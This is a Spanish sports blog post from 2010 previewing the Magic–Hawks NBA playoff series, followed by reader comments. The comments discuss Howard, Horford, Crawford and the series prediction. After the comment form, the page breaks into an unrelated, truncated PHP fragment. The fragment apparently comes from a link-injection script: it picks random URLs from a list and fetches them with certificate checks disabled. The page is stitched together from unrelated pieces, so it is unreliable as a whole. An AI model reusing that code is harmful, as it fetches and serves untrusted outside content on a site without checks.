Análisis Orlando Magic vs Atlanta Hawks

04 de May de 2010 por MagicJohnson32

refhowardRegular: 3-1 Magic

Magic: 102.8 P. Favor (6º) – 95.3 P.Contra (4º)
Hawks: 101.7 P.Favor (12º) – 97.0 P.Contra (9º)

Que levante la mano quien dé a los Hawks opciones reales de victoria en su eliminatoria de semifinales de Conferencia ante los Orlando Magic. ¿Nadie? No, nadie. Y es lógico, dado que se enfrentarán el único que equipo que ha despachado la primera ronda por la vía rápida (el 4-0 de Orlando ante los Bobcats) y el único equipo que ha tenido que recurrir al 7º partido (4-3 de Atlanta frente a los Bucks). Tampoco es que los precedentes de esta regular season den muchos motivos para la esperanza a los de Georgia: de los cuatro enfrentamientos, los Hawks sólo ganaron uno, aquel partido que se resolvió con un palmeo de Josh Smith sobre la bocina. Los otros tres encuentros resultaron contundentes triunfos  de los Magic. Y en todos ellos, incluyendo el único triunfo de los Hawks, se repitió una constante: un absoluto y apabullante dominio en el rebote de Orlando Magic.

En resumen, los números, la lógica, la ciencia, todo dicta una victoria sencilla del equipo dirigido por Stan Van Gundy. Sin embargo, la eliminatoria puede verse reducida a la habilidad de Dwight Howard para manejar los problemas con las faltas. El Mejor Jugador Defensivo del Año apenas ha sido capaz de permanecer sobre el parquet durante la serie contra los Bobcats, en la que ha promediado 5.5 faltas por partido, con algo menos de 10 puntos y 10 rebotes, así como paupérrimos porcentajes de tiro. Ante Atlanta difícilmente podrán los Magic permitirse tantos minutos sin su faro interior.alhorford

Claves de la eliminatoria:

– Horford tiene la llave: Su acierto en los lanzamientos de media distancia determinará si Howard puede permitirse o no permanecer cerca del aro y sellar la zona. Si lanza con buenos porcentajes, el impacto del DPoY se reducirá. Si, además, es capaz de cargar de faltas a Howard, entonces Marvin Williams, Joe Johnson y Josh Smith encontrarán vía libre hacia el aro y los Hawks tendrán mucho ganado. Lo lógico, por otra parte, es que sea Horford quien se vaya pronto al banquillo con un par de faltas y que Howard haga y deshaga ante las carencias interiores de Atlanta.

Los triples: Los Magic tienden a abusar del triple en cuanto las cosas se complican (en ocasiones, de hecho, las cosas se les complican cuando abusan del triple). El 1 de 17 en triples que acumula Carter esta postseason lo compensan por ahora Nelson, Rashard, Pietrus, Barnes y Anderson, todos por encima del 40%. Los Hawks, por su parte, necesitarán que Joe Johnson, Bibby y Crawford estén acertados en los tiros para no depender de la anotación interior.

crawfordDescanso vs ritmo de competición: Los Magic no juegan desde hace siglos (ocho días, el equivalente a siglos en la NBA) mientras que para los Hawks apenas han transcurrido 48 horas desde que finiquitaron a los Bucks. La incercia de ritmo competitivo que arrastra Atlanta puede permitirle un mejor inicio, pero si la serie se alarga tal vez paguen el cansancio ante los Magic descansados.

El factor Crawford: Mejor Sexto Hombre de la temporada, Crawford puede marcar diferencias dado que los Magic no cuentan con un suplente con la capacidad de impacto que éste ha demostrado. Además, Mickael Pietrus, el suplente que mejor rendimiento ofrece para Orlando, llega con unos problemas de tobillo que le hacen ser duda.

Agenda:

– P1: Martes 4 a las 2h (horario España)
– P2: Jueves 6 a las 2h
– P3: Sábado 8 a las 23h
– P4: Lunes 10 a las 2h
– P5: Miércoles 12
– P6: Viernes 14
– P7: Domingo 16

Pronóstico:
4-2 Orlando

Comenta

13 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Buen analisis magicjohnson, aunque la última clave no la comparto. Es cierto que los Magic no tienen ningún jugador con la regularidad anotadora de Crawford en el banco (tampoco es que le haga falta) sin embargo cualquiera del banco te la puede liar en un momento determinado llaménse Redick, pietrus, Anderson (pregunta por él en Atlanta)…En cambio, Crawford es la única opción en el banquillo de los Hawks, el resto apenas aporta (Pachulia, Teague, Evans). El problema de Hawks es que es un equipo demasiado corto

      Citar

  2. TheDeerHunter dice:
    #2

    La cosa en el este empieza ahora a ponerse interesante (que hay que ver lo igualado que está el este que nadie ha llegado a estar ni cerca de dar la sorpresa… y no me digáis los Bucks) Pero es que se pone interesante de verdad… a lo cañero.

    Lo cierto es que opino lo mismo de LDenise… Crawford ha sido mucho Crawford esta temporada, pero Atlanta tiene una plantilla cortísima. Es que lo de Howard ha sido porque los Bobcats se han podido permitir rotarle 3 o 4 tíos dándole cera… pero si ya Horford lo tiene complicado, Pachulia ya va a ser la fiesta. Y a partir de ahí para de contar.

    Todo me huele a Orlando, no sé porqué… La cabeza me podía decir Cleveland pero el instinto nada de nada. Y espero que no parezca oportunismo

      Citar

  3. MagicJohnson32 dice:
    #3

    He añadido calendario de partidos y pronóstico, que se me había pasado.

    Puedo preguntar en Atlanta por Anderson, aunque casi mejor pregunto a Van Gundy, que no lo pone, jeje. Sí, Orlando tiene más banquillo, pero una cosa es tenerlo y otra, utilizarlo.

    De todos modos ya digo que la eliminatoria se jugará en el Horford-Howard.

      Citar

  4. pcerezo dice:
    #4

    Yo estoy con Deer. La experiencia es un grado y estos tíos ya han llegado a la final. Yo estoy emperrado con Orlando me huelen este año a que pueden hacer algo grande, luego la cagaré como siempre, pero creo que son la plantilla mejor equilibrada de la liga. No le doy a Atlanta mas de dos partidos (si es que llegan).
    No os dio ayer la sensación ayer que Shaquille O’Neal se arrastraba?

      Citar

  5. kantonyo dice:
    #5

    Aunque estoy de acuerdo con todos en el analisis que haceis, sobre todo en la plantilla tan corta que tiene Hawks, no lo veo todo tan facil.

    Apuesto por Orlando, pero creo que no va a ser un camino de rosas.

    Se antoja muy interesante el duelo Horford-Howard.

    Dudo que Marvin Williams pueda defender a Lewis. Esta puede ser una de las claves.

      Citar

  6. Love Denise dice:
    #6

    también puede Josh smith defender a Lewis.
    Yo tampoco pienso que va a ser un paseo de Orlando, pronosticaría un 4-2, y pienso que el partido de esta noche puede ser muy peligroso para los Magic debido a que llevan sin jugar una semana

      Citar

  7. sergio dice:
    #7

    Supongo que a Howard le haran muchos 2 contra 1, especialmente cuando Lewis no este en el campo. Lo malo de los Hawks es que no pueden cargar de faltas a los pivots porque no tienen rotacion interior para permitirselo. Nelson puede hacerle un traje a Bibby y me encantara ver el Carter-Johnson aunque dudo que se defiendan durante mucho tiempo estando Pietrus, Barnes y otros mejores defensas que el gran “Air Canada”. No dudo de que los Magic se lleven la serie… es el tipico equipo al que pueden hacerle mucho daño.

      Citar

  8. portu dice:
    #8

    No veo el tema tan claro para Orlando, creo q los Hawks les van a poner una eliminatoria muy difícil e igualada aunque no sé si les llegará para ganar. Por encima de todas para mi la clave es el rebote de Atlanta, q si lo controla podrá correr el contraataque y ahí demostrarán en pleno su poderío físico. Fuera de transiciones rápidas su ataque se resiente ya q sólo tienen 2 tíos capaces de generarse sus propios tiros (Joe J. y J. Crawford). En cuanto a q tengan un plantilla corta para mí es un factor bastante 2rio, y más en esta fase de la competición, lo importante es q los 8 tíos principales lleguen bien y ya está, y 8 tíos solventes sí q tienen los Hawks, quizás sí haría falta un interior más para pegarle 4 o 5 palos a Howard aparte de Pachulia (pq Horford debería defenderlo sin cargarse rápidamente de faltas), pero creo al final Howard nunca dispone de tantas opciones en ataque como para tener q hacerle 15 faltas…; en cuanto a los demás emparejamientos los veo bastante igualados, aunque habrá un cierto desequilibrio en el puesto de base, sobretodo teniendo en cuenta los muchos minutos q juega Crawford (cuando Nelson tenga delante a Bibby le pasará por encima como un cohete), pero si hay uno equilibrado sería el Marvin-Lewis, aunque quizás acabe siendo Josh-Lewis.

      Citar

  9. luigi_sal dice:
    #9

    no sé si alguno está viendo el partido, pero (afortunadamente para mí q soy magic) vaya viaje q le está dando orlando. tre-men-do. howard dominando como quiero y todos aportando. ahora mismo +37 y atlanta en 44 pts cuando falta un minuto para fin del tercer cuarto. no veo yo mucho futuro a los hawks, jejejeej

      Citar

  10. Love Denise dice:
    #10

    hombre luigi, tu tambien eres magic? (ya somos 2 jejjje) yo tambien vi el partido pero no puedo escribir por la noche :), vaya viaje por delante, por detrás, por el medio…de todas formas hay que ser precavido que aún faltan por ganar 3 partidos. Ya comentaré más cuando los compis hagan la crónica.:), aunque no es que haya mcho que comentar, el marcador lo dice todo.

      Citar

  11. pcerezo dice:
    #11

    Ojo a Orlando…Equipo tremendo. Hoy no se puede decir nada del partido. Tal vez previsible, los Hawks psicológicamente vienen de una serie a siete partidos y casi sin descanso.
    El importante va a ser el segundo partido para calibrar si Atlanta puede poner en algún aprieto a Orlando, simplemente aprieto porque veo muy complicado que les ganen la eliminatoria, veremos.

    Lakers a los suyo. A su ritmo, empiezan muy fuerte, bajan el pistón y cuando lo vuelven a necesitar ganan el partido. Los número de Gasol desde abril son tremendos y su influencia en el juego es superlativa cada día es mejor jugador de baloncesto, una pena que no vaya al mundial, lo vamos a pasar realmente mal sin él.

      Citar

  12. HeiNeKeN dice:
    #12

    Vaya palizon, adelante Orlando!! a ver si siguen asi!!

      Citar

  13. portu dice:
    #13

    Qué buena previsión me marqué, jo,jo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>